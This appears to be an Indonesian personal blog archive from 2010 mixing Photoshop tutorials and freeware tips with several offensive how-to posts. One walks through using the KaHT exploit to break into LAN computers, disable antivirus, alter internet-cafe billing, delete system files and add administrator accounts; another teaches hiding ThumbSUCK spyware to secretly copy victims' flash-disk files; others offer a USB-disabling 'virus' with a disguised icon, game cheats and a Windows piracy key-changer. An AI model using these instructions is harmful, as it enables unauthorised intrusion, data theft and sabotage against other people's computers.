Jumat, 01 Oktober 2010

Daftar Situs membuat teman facebook menderita

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Sabtu, 04 September 2010

kk iqbal neh download

http://www.4shared.com/file/HlG7FAyI/JONITA-03092010.html

Kamis, 02 September 2010

http://www.4shared.com/get/0Wzl2Rn4/JONITA-01092010.html

Jumat, 27 Agustus 2010

Kirim SMS Gratis lewat Internet

SMS merupakan salah satu layanan yang kita gunakan untuk mengirim sebuah pesan melalui HP.Mungkin anda yang mengirim pesan harus melalui HP ,anda akan merasa kesal jika seandainya pulsa anda cozz....nehh jadi bingung kan!!!
tapi tenang sobat kini aku akan membntu sobat untuk bagaimana cara mengrim SMS secara gratis via internet .berikut ni situs yang menyediakan layanan untuk SMS gratis langsung ajaaaa

1.http://www.kusms.com/
2.http://s1.gxrg.org/home/
3.http://www.freesms4us.com/

Sekian sedikit artikel yang saya sampaikan
besok besok datang lagiiii yaaaaa!!!1

Selasa, 24 Agustus 2010

datar situs cheat point blank

http://www.yusrilanakdutilas.blogspot.com/

http://www.ziddu.com/download/11248083/cheatpb-jimat_www.maswafa.tk_.rar.html
ps:www.codde.tk_www.maswafa.tk

http://rolandpardosi.wordpress.com/

www.maswafa.tk

Senin, 05 Juli 2010

cross hair buat snifer point blank




halo sobat gmn kangen ya!da ga ap2
Sekarang Gw Mau Share Program Untuk Hacking Crosshair Di Point Blank .. Screenshot :

Point Blank sebagai generasi baru game online frontal war dengan mode game First Person Shooter belakangan ini jadi favorit para gamers. Kedatangan Point Blank sendiri dinilai telah mampu menggeser posisi leluhurnya yaitu Counter Strike. Point Blank yg biasa disingkat PB ini juga mempunyai cara main yg sama dengan Counter Strike yg biasa disingkat CS dari control nya juga strategy bermainnya. Bedanya di PB ada metode BOM MISSION, DEATHMATCH dan ELIMINATE, dan ada juga level/pangkat untuk trooper (sebutan pemain PB) menurut jumlah exp nya.

Disini saya ingin berbagi cheat PB, :)) sebetulnya bukan cheat tp cuma alat bantu aja, ga seperti cheat PB yg sudah beredar kayak unlimited HP, trus aim Head Shot, dll. Tapi ini cuma bantuan cursor di tengah layar, jadi trooper bisa pake cursor aim yg silang empat atau lingkaran, dengan bantuan tool ini akan di tambahkan titik di tengah sehingga diharapkan dapat meningkatkan performa trooper dalam berperang.


Petunjuk :

1. Red + = untuk Merubah warna Crosshair menjadi Merah

2. Green + = Untuk merubah Warna Crosshair Menjadi Hijau

3. Tinggal Klik On / off untuk Aktifan cheat nya..

4.Distance untuk mengatur posisi Crosshair effect

5. untuk yang lisensi gosah di apa apain....

eheh


unduh Cursor Hack dari 4shared.com

Senin, 24 Mei 2010

Software unik: Pengusir nyamuk

Musim hujan telah tiba, tentunya disana- sini banyak nyamuk. Nyamuk yang nge fans sama kamu sehingga mereka selalu hinggap di tubuhmu untuk menghisap darahmu [awas ada drakula kecil]. Aktivitas ngeblog pun kadang- kadang jadi terganggu karena konsen / fokus kita jadi terkurangi akibat tubuh kita yang gatal- gatal karena gigitan nyamuk. Posting jadi malas , Blogwalking jadi terganggu tentunya.. memungkinkan traffic kita turun,ternyata nyamuk berpengaruh juga ya terhadap traffic blog.. he he he. Makanya pakai Obat nyamuk atau Autan [promosi mode:on]. Akan tetapi buat sobat yang suka aktivitas blogging di depan komputer, sekarang bisa terhindar dari nyamuk dengan sebuah software anti nyamuk ini [wah..ada- ada saja.masa ada software anti nyamuk]. Awalnya saya juga heran dan tidak percaya ...wauw..ternyata ada benarnya juga, setelah saya install jalankan gak ada nyamuk lagi yang mau mendekati saya [apa benci sama saya ya? / bau badan saya yang tak sedap].
Bagi sobat yang ingin mencoba software ini, langsung saja dowload disini. Aman dan kapasitasnya cuma sekitar 250 Kb. Apa salahnya mencoba, selain itu nyamuk juga kabur nantinya. iya tidak?
= = = = = = = = = = = = = = = = = = =
Download Soft. Anti Nyamuk dari ziddu
Download Soft. Anti Nyamuk dari download.cnet.com
= = = = = = = = = = = = = = = = = = =

Rabu, 28 April 2010

Cara mengganti background foto

Berikut ini cara untuk mengganti foto background dengan Photoshop. Sebenarnya cara ini mudah sekali, sebenarnya sudah sering saya tuliskan caranya di blog ini. Namun karena masih ada beberapa pertanyaan yang sempat saya tampung, yang intinya masih bingung tentang cara mengganti background, dan memang saya juga belum pernah menulis secara langsung judulnya Mengganti background. Maka pada tutorial Photoshop ini saya tuliskan petunjuknya.

Yang menjadi inti saat kita mau mengganti background adalah kita harus memisahkan lebih dulu antara model foto dengan latar belakang foto sebelumnya. Sedangkan cara untuk memisahkannya adalah dengan membuat seleksi. Tentang pembuatan seleksi, bisa dipelajari dari Kategori seleksi. Yang paling mudah namun tidak saya rekomendasikan adalah menggunakan Lasso.
Langkah mengganti background foto dengan Photoshop

Langkah 1
Bukalah foto yang akan diedit dengan Photoshop

tutorial photoshop ganti background 1

Langkah 2
Buat seleksi pada model fotonya.

tutorial photoshop ganti background 2

Langkah 3
Pilih menu Edit > Copy. Kemudian pilih menu Edit > Paste. Hasilnya akan terjadi layer tambahan, bisa Anda lihat di palet layer (palet ini letaknya di kanan bawah)

tutorial photoshop ganti background 3

Langkah 4
Buka file lain yang akan digunakan sebagai background foto. Setelah file ini dibuka, kemudian pilih Move tool. Dengan tool ini, geserlah gambar dari file yang akan digunakan sebagai latar belakang ke arah file yang sudah dicopy dan paste tadi.

tutorial photoshop ganti background 4

Langkah 5
Ubahlah urutan layernya. Buatlah agar urutan layernya seperti gambar dibawah ini.
Untuk memindah urutannya, bisa dilakukan dengan menggeser nama layernya naik atau turun, diarahkan ke perbatasan tiap nama layer.

tutorial photoshop ganti background 5

Gambar sudah terganti backgroundnya.

tutorial photoshop ganti background 6

Caranya mudah, namun membuat seleksi yang detil memang agak rumit, dan diperlukan jam terbang menggunakan Photoshop. Jadi harus sabar dan rajin berlatih.

29, april 2010


USB DISK EECTOR

aplikasi ini merupakan freeware,namun kalo free blom tentu ga bagus
neh tools penting bangett....klo misal na kamu mau eject Perangkat USB kayak flashdisk dll namun ga bisa .....nah ini neh solusinya download tools na




copas aja ya html lagi rusak http://box.net/shared/6gqazv3k6e

Mengubah foto jadi kartun dengan photoshop

Pada efek kartun kali ini, kita akan membuat banyak bentuk-bentuk secara manual menggunakan Pen Tools. Tehnik seperti ini ada juga yang menyebut sebagai tracing, vektor. Sebenarnya, tehnik seperti ini akan lebih cocok bila dijalankan pada Adobe Illustrator. Namun karena pokok bahasan kita adalah Photoshop, maka sekarang kita coba menggunakan Photoshop saja, walaupun tentunya cara pembuatannya akan lebih rumit.

Jika ingin melihat contoh lain dari gambar trace/vektor ini, beberapa hari yang lalu pernah saya buatkan. Bisa dilihat di Galeri halaman 2.
Langkah pembuatan trace pada foto

Langkah 1
Bukalah sebuah foto dengan Photoshop. Pada contoh tutorial ini, saya menggunakan foto Mas Wasidi aka Si Kecil.

tutorial photoshop trace efek kartun 1

Langkah 2
Karena kondisi foto ini terlalu gelap, maka agar lebih nampak perbedaan antara daerah gelap dan terangnya, maka saya atur dulu pewarnaannya menggunakan Image > Adjustment > Shadow Highlights.

tutorial photoshop trace efek kartun 2

Langkah 3
Duplikat layer background ini, agar kita mempunyai cadangan foto yang aslinya. Untuk jaga-jaga, siapa tahu nanti membutuhkan gambar aslinya. Dan memang akhirnya kita juga butuh foto aslinya, untuk membuat bentuk-bentuk yang agak rumit, misalnya mata dan bibir.
Cara untuk menduplikat ini bisa dengan Ctrl + J, atau dengan menarik nama layer ke arah icon Create New Layer.

Langkah 4
Pilih menu Image > Adjustment > Posterize. Isikan nilai yang kecil. Misalnya 4.

tutorial photoshop trace efek kartun 3

Tujuan langkah ini adalah untuk mengurangi jumlah warna yang digunakan.

Langkah 5
Duplikat lagi layer foto yang sudah diposterize ini. Ubah blending option menjadi Darken.

tutorial photoshop trace efek kartun 4

Pilih menu Filter > Blur > Gaussian Blur. Atur nilai Radius secukupnya, sambil melihat gambar aslinya (jangan melihat gambar preview pada kotak dialog Gaussian Blur). Tujuan langkah ini adalah untuk membuat agar muncul perbatasan yang lebih tegas pada tiap warna yang ada.

tutorial photoshop trace efek kartun 5

Langkah 6
Sekarang kita mulai langkah pembuatan layer untuk melakukan trace.
Buatlah sebuah layer baru, dengan cara melakukan klik pada icon Create a new layer (di gambar dibawah ini saya tandai dengan lingkaran merah) . Kemudian ubahlah nilai opacity pada layer ini hingga 0% (saya tandai dengan lingkaran biru).

tutorial photoshop trace efek kartun 6

Langkah 7
Pilih Pen tools pada tool box photoshop (lingkaran merah pada gambar tutorial photoshop di bawah ini).

tutorial photoshop trace efek kartun 7

Kemudian lakukan pengaturan pada option bar. Pilihlah icon Shape layers (gambar lingkaran biru). Klik icon segitiga geometri option (gambar lingkaran hijau), kemudian beri tanda cek pada pilihan Rubber Band.

Di sebelah kanan dari pengaturan tersebut, terdapat beberapa icon lagi (gambar lingkaran ungu). Tentunya sudah Anda pelajari pada tutorial photoshop sebelum ini. Jika belum, silahkan dibaca dulu pada Cara Pembuatan Shape.

Sedangkan tentang penggunaan pen tool bisa dibaca pada Tutorial Photoshop yang judulnya Membuat Seleksi Dengan Path.

Langkah 8
Buatlah bentuk shape menggunakan Pen tool. Buatlah mengikuti bentuk wajah pada foto.

tutorial photoshop trace efek kartun 8

Buatlah garis path ini melingkar hingga menyambung dari titik awal sampai akhir, sehingga terjadi sebuah bentuk bangun.

tutorial photoshop trace efek kartun 9

Langkah 9
Ulangi langkah ke-6 dan ke-7, namun kali ini buatlah bentuk shape pada area warna yang lain. Setiap bentuk shape dibuat pada sebuah layer baru.

tutorial photoshop trace efek kartun 10

tutorial photoshop trace efek kartun 11

Jumlah bentuk shape yang dibuat kita batasi antara 2 sampai 4 warna saja.

Langkah 10

Ubahlah nilai opacity pada layer-layer shape yang sudah kita buat tadi. Opacity kita buat hingga 100%. Sehingga nampak foto tertutupi oleh warna-warna.

Untuk mengubah warna pada setiap layer shape, lakukan dengan cara melakukan klik 2 kali pada thumbnail layer-nya. Kemudian pilih salah satu warna.

tutorial photoshop trace efek kartun 12

Sebagai panduan dalam memilih warna-warna kulit, berikut ini saya sertakan beberapa warna yang bisa Anda gunakan.

tutorial photoshop trace efek kartun 13

Ubahlah setiap warna pada semua bagian wajah tersebut.

tutorial photoshop trace efek kartun 14

Saat membuat bentuk shape pada area warna yang lain, jika ada layer yang menutupi sehingga kita kesulitan untuk menentukan bentuk shape, maka untuk sementara icon mata pada layer yang menutupi bisa dimatikan dulu atau di kurangi dulu opacity-nya.

tutorial photoshop trace efek kartun 14a

Kemudian ulangilah lagi membuat bentuk shape pada semua bagian tubuh, hingga keseluruhan foto tertutup oleh bentuk-bentuk shape.

tutorial photoshop trace efek kartun 15

Pada bagian mata dan bibir, karena bagian ini termasuk bagian pokok dalam mengenali wajah seseorang, kita perlu mematikan dulu beberapa icon mata pada palet layer. Sehingga kita bisa membuat trace dengan melihat bentuk aslinya yang belum ter-posterize.

Untuk bagian jenggot, saya menggunakan Brush tool berukuran kecil yang disapukan pada gambar dengan pengaturan Brush preset Scattering.

Langkah 11
Untuk membuat latar belakang pada foto, buatlah sebuah layer baru yang diletakkan pada urutan sebelah bawah dari bentuk-bentuk shape tersebut. Layer baru ini bisa diisi warna sesuka Anda, dengan memilih menu Edit > Fill.

tutorial photoshop trace efek kartun 16

Warna tidak harus putih, Anda bisa juga menggunakan warna-warna lain, misalnya dengan Gradient Tools seperti berikut ini.

tutorial photoshop trace efek kartun 17

Jika semua gambar akan dijadikan satu, bisa dilakukan dengan memilih menu Layer > Flatten Image.

Selamat mencoba tutorial membuat kartun dengan Photoshop ini.

masuk ke PC orang lain

mungkin ini untuk terakhir kali nya saya posting..,...
ato..........udah lah..forget it...
saya hanya ingin berbagi....dan melengkapi...

Cara masuk di komputer lain lewat DOS (Windows XP / 2000) Anda ingin masuk dikomputer teman anda dalam sebuah LAN?
bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja?
itu mudah, semua caranya ada disini.

================================================== ====================

1.Pertama-tama anda harus tahu 2 program penting yaitu internet Maniac (Internet Maniac.exe) Berfungsi untuk mengetahui
ip addreas client melalui computer name / hostname KaHT (KaHt.exe)program hacker KaHT Berfungsi sebagai program untuk menerobos
ke computer server atau client Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dsb.

================================================== ====================

2.anda periksadahulu jaringan anda dengan melihat para hostname dengan 2 cara.
ekstractlah dahulu program tersebut,setelah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname
dengan 2 cara.Untuk Windows XP Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu
pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan.
Untuk Windows 2000/XP/vista (kalau anda menemukan open port 135 di OS ini)
Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers.

================================================== ====================

3.lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul (Alternatif cara yang cepat
dapat mengklik My Network Place / Network Neighboure saja)Setelah anda mendapatkan sasaran computer yang akan di masukin / diremote maka
anda langsung saja jalankan program Internet Maniac.

================================================== ====================

4.Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut.
Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program
Internet Maniac,

================================================== ====================

5.kita akan beralih dengan program KaHT, program ini akan didetect sebagai Trojan
oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu disable untuk sementara antivirusnya,
satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting,
tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.

================================================== ====================

6.Cara masuk DOS Mode Untuk Windows XP : Masuklah ke Start,
All programs, Accessories lalu Command Prompt Untuk Windows masuk DOS maka masuklah di directory program KaHT,misal tadi di di extract di
C:\""KaHt maka ketikkan "CD\""KaHT"....(dst :P)Jika sudah, ini saatnya? Ketikkan "KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
kalau bingung bisa begini : "KaHT Ip1 ip2" ip1 : ip awal yang discan ip2 : ip terahkir yang discan Misalnya tadi ip-nya 192.168.0.1 setelah
di detect pakek Internet Maniac tadi. Maka ketikkan saja "KaHT 192.168.0.0 192.168.0.1" lalu enter Nah disini nanti program akan bekerja
otomatis. Setelah selesai scanning jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran,
untuk lebih persisnya anda akan berada di "c:\""windows\""system" milik komputer tujuan / sasaran setelah pen-scan-an selesai.
Anda bisa bebas di computer sasaran mau edit atau di delete pun bisa, hehe Nah kalo udah begini kita bisa berkreasi : Pingin biaya warnet
kita lebih murah ? gampang masuk aja di billing server, ketik Time,ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan
ama operator warnetnya kasian khan (secara ane' juga OP warnet dull...:P)
Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenernya bisa lho,
delete aja file-file systemnya,hehehhehe. Diatas cuman kreasi dikit aja,kalian bisa saja memanfaatkannya jauh
lebih bermanfaat dari pada diatas Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP,vista
dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab..

================================================== ====================

7.Membuat akses administrator Windows untuk kita lewat komputer lain Kita ingin membuat administrator Windows XP/2000
di komputer lain melalui LAN ?sangat mudah,caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas,
lalu kita akan mencoba beberapa trik.Melihat akses guest dan administrator di Windows Ketik : net user Melihat aktif tidaknya guest
di Windows Ketik : net user guest Membuat akses guest menjadi Administrator dengan perintah : Ketik : net localgroup
Administrators Guest /add Membuat akses adminstrator sendiri :

1. Ketik : net user /add

2. Ketik : net localgroup Administrators /add Menghapus akses administrator Ketik : net localgroup Users /delete 1.
Cara mengetahui password administrator Windows - Download Proactive Windows Security Explorer

================================================== ====================

untuk lebih jelas dan detilnya
bisa di download di sini....dan ada software nya di situ...

THANK's to : cakill, and all friends...

Selasa, 13 April 2010

Membuat Desain Kertas Post-It dengan Photoshop

desain kertas post it

Lucu-lucu kan kertas post-itnya, mau tahu cara desain kertas post-it dengan photoshop ? Ngga perlu master untuk bikin kertas post-it itu, kita udah buat langkah-langkah sederhananya. simak yah !

Buka photoshop anda, dalam tutorial desain kertas post-it kali ini menggunakan photoshop cs2.

1. buatlah canvas baru, dengan shourcut Ctrl + n, atau File >> New

new canvas

2. Lalu buat layer baru, dengan shortcut Shift + Ctrl + n, atau Layer >> New >> Layer

new layer photoshop

3. Buatlah kotak dengan Rectangle Tool, dengan foreground warna kuning. kotak tersebut adalah bentuk kertas post-it

rectangel tool photoshop

4. Lalu gunakan style Drop Shadow.

drop shadow

5. Masukan Drop Shadow seperti gambar berikut

seting drop shadow photoshop

6. Create layer untuk drop shadow, dengan cara klik kanan logo efek1 Membuat Desain Kertas Post It dengan Photoshop disamping layer “Shape 1″, lalu pilih “Create Layer”

create layer drop shadow

jika muncul kotak dialog seperti gambar dibawah klik OK

yes create layer copy

akan menghasilkan layer baru bernama “Shape 1’s Drop Shadow”

hasil create layer

7. Kita akan melelukan kertas post-it, pilih kembali layer “Shape 1″, lalu Edit >> Transform Path >> Warp

warp kertas

8. tarik titik yang ditanda panah sesuai dengan arah panah, jika dirasa cukup lekuk tekan enter.

wrap kertas

9. Seletah kertas post-it kita lekukan, giliran bayangannya direnggangkan. Pilih layer “Shapes 1’s Drop Shadow”

pilih layer dropshadow

10. tarik titik yang ditanda panah sesuai dengan arah panah.

wrap bayangan shadow

11. Langkah diatas sudah cukup untuk membuat kertas post-it sederhana, kini kita akan menggubah warna kertas post-it seakan-akan terkena cahaya dari atas, karena bayangan berada dibawah.

Pilih layer “Shape 1″

12a-pilihlayer1 copy

12. Pilih Gradient Overlay

pilih gradient overlay

13. Klik bagian gradien

13a klik copy Membuat Desain Kertas Post It dengan Photoshop

14. hingga muncul gambar dibawah, pilih gradient hitam putih, lalu klik “a” lalu klik “aa”

klik copy

13. masukan warna sesuai warna dibawah, lalu klik tombol OK

masukan copy

14. ulangi dengan klik “b” lalu klik “bb”

klik copy

15. masukan seperti warna dibawah

masukan copy

16. Maka hasil akhir akan seperti gambar dibawah, bentuk post-it akan terlihat seperti kertas13d ok copy Membuat Desain Kertas Post It dengan Photoshop

17. Langkah selajutnya adalah input text dengan Horizontal Type Tool horizontal tool type Membuat Desain Kertas Post It dengan Photoshop

inputtext copy

demikian lah cara membuat desain kertas post-it yang melengkung diberi efek cahaya dan bayangan. mudah bukan ?

jangan bilang susah kalau belum dicoba.

Jumat, 26 Maret 2010

Sebuah program virus penonaktif USB Port



Dalam posting ini saya akan menunjukkan cara membuat virus yang sederhana Menonaktifkan / blok port USB pada komputer (PC). Seperti biasa favorit saya menggunakan bahasa pemrograman C untuk menciptakan virus ini. Siapa pun dengan pengetahuan dasar bahasa C harus mampu memahami kerja program virus ini.

Setelah dijalankan virus ini akan segera menonaktifkan semua port USB di komputer. Akibatnya the'll tidak akan dapat menggunakan pena drive atau perangkat USB lainnya pada komputer. Source code virus ini tersedia untuk download. Anda dapat menguji virus ini pada komputer Anda sendiri tanpa khawatir karena aku juga diberi program untuk mengaktifkan kembali semua port USB.

1. Download file di komputer anda.

2. Berikut ini berisi 4 file.

* Block_usb.c (source code)
* Unblock_usb.c (source code)

3. Anda perlu kompilasi dukungan tersebut sebelum Anda dapat menjalankannya. Sebuah langkah-demi-langkah untuk mengkompilasi program C yang diberikan in my post - Cara Compile C Program.

3. Setelah penyusunan block_usb.c Anda mendapatkan block_usb.exe yang merupakan virus yang sederhana akan memblokir (disable) semua port USB di komputer atas eksekusi (double klik).

4. Untuk menguji virus ini, hanya menjalankan file block_usb.exe dan masukkan pena USB drive (thumb drive). Sekarang Anda dapat melihat bahwa pena drive Anda tidak akan pernah bisa terdeteksi. Untuk kembali mengaktifkan port USB hanya menjalankan unblock_usb.exe (Anda perlu untuk mengkompilasi unblock_usb.c) file. Sekarang masukkan pena drive dan itu harus terdeteksi.

5. Anda juga dapat mengubah ikon file ini agar terlihat seperti program yang sah. Untuk detail lebih lanjut tentang ini berarti saya posting - Cara Mengubah ikon dari sebuah file EXE (Langkah ini juga opsional).

Saya harap Anda seperti ini. Tolong sampaikan komentar Anda.

Senin, 22 Maret 2010

Mengubah Windows Palsu Menjadi Asli




Bagi anda yang mau mengubah Windows XP bajakannya menjadi asli,mungkin bisa di coba cara berikut ini.

Sebelumnya silahkan download dulu file ini. DOWNLOAD

STEP I

Jalanin keyFinder.exe(Beberapa antivirus mungkinakan mendetekna sebagai spyWare). Akan terlihat seperti gambar berikut :


STEP II

Trus pilih change windows key.


STEP III

Ganti deh keyna. Pke windows xp key.txt yg uda dibundel dalam paket. Trus lik OK. Akan ada pemberitahuan bila berhasil


STEP IV –> Finish

cek keaslian windows anda sekarang. Buka folder “Tool dari Microsoft Buat Cek Windows asli ato palsu”, jalanin “Microsoft Genuine Advantage Diagnostic Tool.exe”. Tunggu bentar. kalo berhasil akan terlihat seperti gambar 4:


Validation Status windows anda sekarang “Genuine” Kalo gagal (Status Invalid/BLK) Coba Lagi.

Sabtu, 06 Maret 2010

Melindungi Data Dengan SaveIt!

SaveIt merupakan software gratis yang dapat Anda gunakan untuk melindungi data atau aplikasi dengan cara menambahkan password pada data atau aplikasi tersebut. Jadi, pada saat Anda membuka file data atau aplikasi tersebut maka akan muncul kotak dialog untuk memasukkan password.

Dulu klik-kanan.com pernah menulis beberapa software bantu untuk melindungi data, misalnya Folder Access atau Folder Guard. Nah software SaveIt ini dapat Anda jadikan alternatif lain untuk meningkatkan keamanan data Anda.

Untuk menggunakan SaveIt caranya sbb:

  1. Jalankan software SaveIt!
  2. Klik tombol Browse yang terletak di bawah kotak edit File Name.
  3. Jika Anda ingin memberi password pada file jenis aplikasi maka pada pilihan “File of type” pilih Application. Jika Anda ingin memberi password pada jenis file dokumen maka pilih “to a program linked to documents”.
  4. Selanjutnya klik tombol Next.
  5. Isikan password yang Anda inginkan pada kotak isian Password dan Repetition.
  6. Klik tombol Next.
  7. Akan muncul jendela progress bar yang menandai proses pengaktifan password.

Jika langkah yang Anda lakukan benar maka saat Anda membuka dokumen atau menjalankan aplikasi yang telah diproteksi maka akan muncul kotak dialog untuk mengisikan password seperti pada gambar di bawah ini:

Klik tombol Start membuka dokumen atau menjalankan aplikasi.

Jika Anda ingin menonaktifkan proteksi pada file tersebuat maka klik tab Setup lalu klik tombol Remove protection.

Homepage: http://www.neroes.de/
Download: saveit21.exe




Selasa, 23 Februari 2010

Curi File Dalam Flash Disk Orang Lain



Ok…… sekarang maz pudja akan membagikan sedikit ilmu pengetahuan tentang cara mencuri file orang lain secara diam-diam. Nah, bagi rekan-rekan sekalian yang sedang sakit kepala karena minggu depan sedang menghadapi ujian tengah semester atau

Ujian kecil-kecilan lainnya, atau yang ingin tau rahasia pribadi seseorang mungkin Software mata-mata ini dapat membantu…… kali aja dengan caram memasukkan program spyware ini rekan-rekan sekalian dapat menemukan file ujiannya

Pertama-tama maz pudja kenalkan dulu program ini bernama THUMSUCK.

Sebuah aplikasi yang digunakan untuk mengcopy file seseorang secara diam-diam dari dalam sebuah Flash Disk, tanpa diketahui oleh sang korban….. Penasaran …….. sabar ikutin terus artikel ini.
yang mau mendownload dan mencoba silahkan langsung saja menuju TKP disini tempatnya

Nah, setelah rekan-rekan mendownloadnya, copy ThumbSUCK.exe kedalam suatu directory tersembunyi. Misalnya saja kalian letakkan di Local Drive D:\. Buatlah suatu directory dengan atribut SUPER HIDDEN agar korban tidak curiga.untuk membuat direktori yang super hidden ini, Ikuti panduan berikut:

1. Buatlah directory baru di D:\ atau dimanapun anda suka. Beri nama terserah anda.
Pada contoh ini saya beri nama korban. Salinlah ThumbSUCK.exe kedalam
directory tersebut lalu klik 2X untuk menjalankannnya.

2. Klik Start – Run lalu ketik cmd.

3. Kini saatnya menjadikan directory tersebut menjadi super hidden. Gunakan saja perintah attrib dengan format attrib lokasifolder +s +h. Karena nama directory yang tadi dibuat adalah korban yang terletak di drive D:\ maka ketik: attrib d:\korban +s +h lalu tekan ENTER.

Selesai sudah.. kini cobalah anda tancapkan sendiri FlashDISK anda. Data-data anda yang berada didalam FlashDISK akan disalin dengan silent mode oleh ThumbSUCK.exe kedalam directory gudangkorban di suatu folder dengan nama sesuai dengan volume label Flashdisk.

Karena directory korban diberi atribut super hidden, maka hilangkan terlebih dahulu tanda centang pada opsi Hide Protected Operating System Files (Recomended) dan beri centang pada Show Hidden Files and Folders di Folder Options dengan cara pada windows explorer klik menu Tools -> Folder Options.

Untuk mendisable aplikasi ini, sangat mudah gunakan Windows Task Manager (CTRL-ALT-DELETE) atau gunakan saja Task Manager. Sangat mudah bukan……….. jadi yang pusing karena besok-besok mau ujian dan sebagainya mending pakai ini software dijamin 100% langsung tersenyum lebar sendiri……. OK

Bagaimana jika ditanam di komputer public? atau ditanam di lab-lab kampus? bisa…… caranya dengan sedikit beramain-main Registry, anda dapat membuat aplikasi ini otomatis berjalan ketika windows startup (autorun)
wkwkwkwkwkwkkwkwk dan tentunya anda bisa panen data pribadi orang lain.

Maz Pudja tidak bertanggung jawab atas penyalahgunaan artikel dan software ini…… jadi jika ketahuan oleh si korban jangan salahkan saya. Tapi salahkan diri anda kenapa mau mencoba.



Sabtu, 13 Februari 2010

Memberikan password pada folder dengan mudah




Sebelum sandi melindungi setiap dokumen yang Anda mungkin ingin membuat cadangan dari non-password folder dan file yang dilindungi jika anda melupakan password di masa depan.

Sebagian besar sistem operasi Microsoft Windows tidak datang dengan metode password yang melindungi file sensitif Anda dan / atau folder. Jika Anda menggunakan Microsoft Windows 3.x, Windows 95, Windows 98, Anda akan perlu untuk men-download atau membeli program pihak ketiga untuk password melindungi file dan folder dalam Windows; melompat turun ke bagian solusi keamanan lain jika Anda ' kembali menggunakan salah satu sistem operasi ini.

Microsoft Windows XP pengguna profesional
Microsoft Windows XP home pengguna
Solusi keamanan lain untuk melindungi file dan folder dalam Windows
Hal-hal yang perlu diingat ketika enkripsi atau password melindungi file dan folder

Microsoft Windows XP pengguna profesional

Langkah-langkah di bawah ini untuk mengenkripsi file pada Windows XP profesional berlaku untuk pengguna yang menggunakan komputer yang memiliki account yang berbeda. Jika Anda menggunakan satu account untuk semua pengguna yang menggunakan komputer anda perlu melihat di bawah bagian solusi keamanan lainnya.

1. Pilih folder yang Anda inginkan untuk mengenkripsi.
2. Klik kanan folder dan klik Properties.
3. Klik tombol Advanced.
4. Centang "Encrypt contents to secure data" pilihan.
5. Klik Apply dan kemudian Ok.

Isi untuk mengenkripsi data aman berwarna abu-abu

Ini akan berwarna abu-abu jika Anda menggunakan edisi rumah Microsoft Windows XP. Lihat di bawah ini langkah-langkah untuk mengamankan isi folder di Windows XP home.

Tampilkan "Encrypt" pada menu konteks

Versi terbaru dari TweakUI juga memungkinkan Anda untuk menampilkan pilihan Encrypt dalam menu konteks. Untuk melakukannya, ikuti langkah-langkah di bawah ini.

1. Buka TweakUI. Jika Anda tidak memiliki TweakUI Anda dapat menemukan rincian tambahan tentang mendapatkan dan menginstal TweakUI dalam dokumen CH000141.
2. Pada jendela TweakUI, pilih Explorer
3. Di sisi kanan jendela di bawah Pengaturan, cari Tampilkan 'Encrypt' pada menu konteks, kemudian centang kotak. Opsi ini harus di bawah Awalan 'pintas untuk' pintas baru dan di atas Tampilkan 'View workgroup komputer' di NetPlaces.

Jika Anda kehilangan pilihan ini, lihat dokumen CH000711 untuk informasi tambahan.

Microsoft Windows XP home pengguna

1. Pilih folder yang Anda inginkan untuk mengenkripsi.
2. Klik kanan folder dan klik Properties.
3. Klik tab sharing.
4. Centang kotak Membuat folder ini swasta
5. Klik Apply dan kemudian Ok.

Membuat folder ini berwarna abu-abu pribadi

Agar pilihan ini untuk bekerja di Microsoft Windows XP home Anda harus memenuhi persyaratan di bawah ini.

1. Hard disk drive harus diformat dalam NTFS dan bukan FAT32. Informasi tambahan tentang cara menentukan jenis sistem berkas hard disk Anda sedang berjalan dapat ditemukan pada dokumen CH000713.
2. Folder Anda mencoba untuk mengenkripsi harus berada dalam folder pribadi Anda sendiri. Sebagai contoh, jika nama Anda adalah bob, Anda harus mengenkripsi folder yang sedang atau yang terdapat dalam folder di bawah ini:

C: \ Documents and Settings \ Bob \

Anda tidak dapat mengenkripsi ada folder di luar folder ini. Jika Anda ingin mengenkripsi luar folder ini lihat di bawah ini solusi keamanan lainnya.

Solusi keamanan lain untuk melindungi file dan folder dalam Windows

File dan folder tidak sering digunakan

Jika Anda perlu password melindungi file dan / atau folder yang Anda tidak sering digunakan, salah satu cara yang paling sederhana adalah dengan menekan folder dan file dengan utilitas kompresi dan password melindungi file terkompress. Namun, setiap kali Anda ingin bekerja atau memodifikasi file yang akan perlu untuk uncompress file dengan menggunakan password.

Windows ME dan Windows XP users - Microsoft Windows ME dan Windows XP datang dengan utilitas kompresi mereka sendiri. Utilitas ini juga dapat digunakan untuk kompres dan password melindungi file.

Tip: Bila sebuah file yang dikompresi, pengguna tetap dapat melihat daftar file dalam file terkompress. Jika Anda ingin untuk kedua nama file Anda dan isi menyembunyikan, memindahkan semua file ke dalam satu folder dan sandi melindungi folder itu.

File dan folder yang sering digunakan atau diakses

